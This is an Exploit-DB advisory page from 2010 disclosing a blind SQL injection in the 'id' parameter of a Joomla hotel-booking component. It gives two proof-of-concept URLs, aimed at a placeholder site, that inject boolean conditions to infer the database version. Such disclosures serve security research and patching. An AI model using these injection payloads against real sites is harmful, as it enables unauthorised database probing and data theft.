Joomla! Component Regional Booking - 'id' Blind SQL Injection

EDB-ID:

11061

CVE:

N/A


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2010-01-07


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack